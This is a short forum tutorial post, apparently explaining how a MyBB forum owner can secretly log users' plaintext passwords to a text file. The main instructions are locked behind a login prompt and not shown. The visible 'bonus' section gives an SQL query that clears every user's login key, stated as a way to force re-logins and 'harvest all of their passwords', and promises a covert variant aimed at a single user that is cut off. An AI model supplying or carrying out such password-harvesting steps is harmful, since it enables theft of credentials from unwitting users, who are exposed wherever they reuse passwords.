This is my first tutorial here. Some sketchy kid is going to find this quite useful.
Please use this responsibly, and now that you know how this is done - never use the same password on a forum as you do on any other website!
Content locked
This content has been locked. Please login or register in order to unlock it.
Remember that the path of the text file is relative - it is just an example of where I might store my copy of MyBB, you need to edit the command and PHP code accordingly!
For security you could hide the text file up one directory level, within the Linux file system where visitors to your forum can't access (unless you have some kind of directory traversal vulnerability on your webserver).
I hope that you guys enjoyed this.
BONUS CONTENT:
So, you just followed the tutorial and now you want to make all of your users logged out?
Connect to your SQL database and run the following query:
Code:
UPDATE mybb_users SET loginkey='';
This will force all users to login again, meaning you can harvest all of their passwords when they do so.
Or, if you'd like to be covert and only get one particular user's password do this, and replace x with their UID: